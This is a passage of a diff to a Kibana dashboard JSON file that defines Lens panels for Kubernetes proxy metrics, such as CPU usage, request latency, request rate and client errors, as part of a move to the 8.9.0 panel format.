"301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Differences in Controller Proxy", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Differences in Controller Proxy", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "markdown", - "uiState": {} + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 4, - "i": "6a11dafa-5cd1-49e7-9806-15110738093d", - "w": 48, - "x": 0, - "y": 48 + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "6a11dafa-5cd1-49e7-9806-15110738093d", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { - "columnOrder": [ - "35a11916-4ca3-421b-9df2-521f52f21fbb", - "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "43097f7a-e478-47bc-81c1-7541bd899d46", - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1", - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "columns": { - "35a11916-4ca3-421b-9df2-521f52f21fbb": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.verb" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency s", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", - "isFormulaBroken": false - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X2" - ], - "scale": "ratio" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.duration.us.sum" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.duration.us.count" - }, - "43097f7a-e478-47bc-81c1-7541bd899d46X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Average latency s", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "name": "divide", - "type": "function" - }, - 1000 - ], - "location": { - "max": 126, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", - "type": "function" - } - }, - "references": [ - "43097f7a-e478-47bc-81c1-7541bd899d46X0", - "43097f7a-e478-47bc-81c1-7541bd899d46X1" - ], - "scale": "ratio" - }, - "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 45 + }, + "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "6a11dafa-5cd1-49e7-9806-15110738093d", + "w": 48, + "x": 0, + "y": 48 + }, + "panelIndex": "6a11dafa-5cd1-49e7-9806-15110738093d", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests counter rate , Client error responses counter rate** and **Server error responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis > @timestamp > Minimum interval**.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "w": 24, + "x": 0, + "y": 52 + }, + "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9": { + "columnOrder": [ + "35a11916-4ca3-421b-9df2-521f52f21fbb", + "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "43097f7a-e478-47bc-81c1-7541bd899d46", + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1", + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "columns": { + "35a11916-4ca3-421b-9df2-521f52f21fbb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "legendSize": "xlarge", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "secondaryFields": [ + "kubernetes.proxy.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.proxy.host" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency s", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency s", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 126, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.client.request.duration.us.sum)/last_value(kubernetes.proxy.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 52 + "layers": [ + { + "accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "xlarge", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { - "columnOrder": [ - "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "8a2e9cea-60fb-4603-a072-9b0e6194344c", - "63268365-bb35-456f-831c-78238984a061", - "63268365-bb35-456f-831c-78238984a061X0", - "63268365-bb35-456f-831c-78238984a061X1" - ], - "columns": { - "63268365-bb35-456f-831c-78238984a061": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Requests", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "63268365-bb35-456f-831c-78238984a061X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "63268365-bb35-456f-831c-78238984a061X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.client.request.count: *" - }, - "isBucketed": false, - "label": "Part of Requests", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "63268365-bb35-456f-831c-78238984a061X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Requests", - "operationType": "counter_rate", - "references": [ - "63268365-bb35-456f-831c-78238984a061X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "8a2e9cea-60fb-4603-a072-9b0e6194344c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average request latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "w": 24, + "x": 24, + "y": 52 + }, + "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7c7c4b67-a2df-427f-abbd-635e5fa73a9c": { + "columnOrder": [ + "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "8a2e9cea-60fb-4603-a072-9b0e6194344c", + "63268365-bb35-456f-831c-78238984a061", + "63268365-bb35-456f-831c-78238984a061X0", + "63268365-bb35-456f-831c-78238984a061X1" + ], + "columns": { + "63268365-bb35-456f-831c-78238984a061": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Requests", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "63268365-bb35-456f-831c-78238984a061" - ], - "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", - "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", + "isFormulaBroken": false + }, + "references": [ + "63268365-bb35-456f-831c-78238984a061X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "63268365-bb35-456f-831c-78238984a061X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.client.request.count: *" + }, + "isBucketed": false, + "label": "Part of Requests", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "63268365-bb35-456f-831c-78238984a061X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Requests", + "operationType": "counter_rate", + "references": [ + "63268365-bb35-456f-831c-78238984a061X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "8a2e9cea-60fb-4603-a072-9b0e6194344c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d3b90051-0bb2-41e0-9d5d-34ff145dba09": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "w": 24, - "x": 24, - "y": 52 + "layers": [ + { + "accessors": [ + "63268365-bb35-456f-831c-78238984a061" + ], + "layerId": "7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "d3b90051-0bb2-41e0-9d5d-34ff145dba09", + "xAccessor": "8a2e9cea-60fb-4603-a072-9b0e6194344c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "91a7ce56-6a49-4b7e-837f-31c184b48c09", - "title": "Requests counter rate", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "acbb7181-0ff2-4164-9761-8b2c430d6a68": { - "columnOrder": [ - "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", - "a42b9c5d-612b-4849-be9e-2405c3ad6e28", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8f", - "eb7e83d0-db8e-4b46-963c-3f2e8f343546", - "2a6c7891-abb8-467d-ba48-e1807a096b9c", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1", - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" - ], - "columns": { - "2a6c7891-abb8-467d-ba48-e1807a096b9c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "differences", - "references": [ - "eb7e83d0-db8e-4b46-963c-3f2e8f343546" - ], - "scale": "ratio" - }, - "a42b9c5d-612b-4849-be9e-2405c3ad6e28": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto", - "sortField": "@timestamp" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "eb7e83d0-db8e-4b46-963c-3f2e8f343546": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of differences(max(kubernetes.proxy.client.request.count))", - "operationType": "max", - "params": { - "emptyAsNull": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "eb84dd5b-79c5-4928-8636-fcc56d70b7fc": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "kubernetes.proxy.code", - "kubernetes.proxy.method" - ], - "size": 4 - }, - "scale": "ordinal", - "sourceField": "kubernetes.proxy.host" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Client errors", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.client.request.count))", - "isFormulaBroken": false - }, - "references": [ - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.client.request.count" - }, - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Part of Client errors", - "operationType": "counter_rate", - "references": [ - "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Requests counter rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", + "w": 24, + "x": 0, + "y": 66 + }, + "panelIndex": "24a2f3ce-a762-4e5f-8794-ff67fc70a41d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-acbb7181-0ff2-4164-9761-8b2c430d6a68", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "acbb7181-0ff2-4164-9761-8b2c430d6a68": { + "columnOrder": [ + "eb84dd5b-79c5-4928-8636-fcc56d70b7fc", + "a42b9c5d-612b-4849-be9e-2405c3ad6e28", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8f", + "eb7e83d0-db8e-4b46-963c-3f2e8f343546", + "2a6c7891-abb8-467d-ba48-e1807a096b9c", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX1", + "fea759f8-df7f-4c51-8163-03ed7c9e1a8fX0" + ], + "columns": { + "2a6c7891-abb8-467d-ba48-e1807a096b9c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "differences", + "references": [ + "eb7e83d0-db8e-4b46-963c-3f2e8f343546" + ], + "scale": "ratio" + }, + "a42b9c5d-612b-4849-be9e-2405c3ad6e28": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto", + "sortField": "@timestamp" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "eb7e83d0-db8e-4b46-963c-3f2e8f343546": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of differences(max(kubernetes.proxy.client.request.count))", + "operationType": "max", + "params": { + "emptyAsNull": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.client.request.count" + }, + "eb84dd5b-79c5-4928-8636-fcc56d70b7fc": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "947a681d-0eb3-462e-a2cb-5adade5d6c85", - "key": "query", - "negate": false, - "type": "custom" - }, - "query": { - "range": { - "kubernetes.proxy.code": { - "gte": 400, - "lt": 500 - } - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "kubernetes.proxy.code", + "kubernetes.proxy.method" ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 4 + }, + "scale": "ordinal", + "sourceField": 